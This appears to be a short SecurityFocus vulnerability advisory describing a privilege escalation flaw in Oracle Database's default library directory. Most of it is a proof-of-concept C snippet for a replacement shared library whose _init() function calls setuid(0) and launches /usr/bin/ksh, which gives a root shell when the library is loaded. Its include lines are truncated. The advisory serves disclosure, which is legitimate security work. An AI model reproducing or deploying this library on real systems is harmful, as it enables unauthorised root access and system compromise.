Oracle Database Default Library Directory Privilege Escalation Vulnerability

No exploit is required to leverage this issue. The following proof of concept code has been provided to be used to generate a replacement library:

#include
#include

_init() {
printf("en el _init()\n");
printf("Con PID=%i y EUID=%i",getpid(),getuid());
setuid(0);
system("/usr/bin/ksh");
printf("Saliendo del Init()\n");
}


 

Privacy Statement
Copyright 2010, SecurityFocus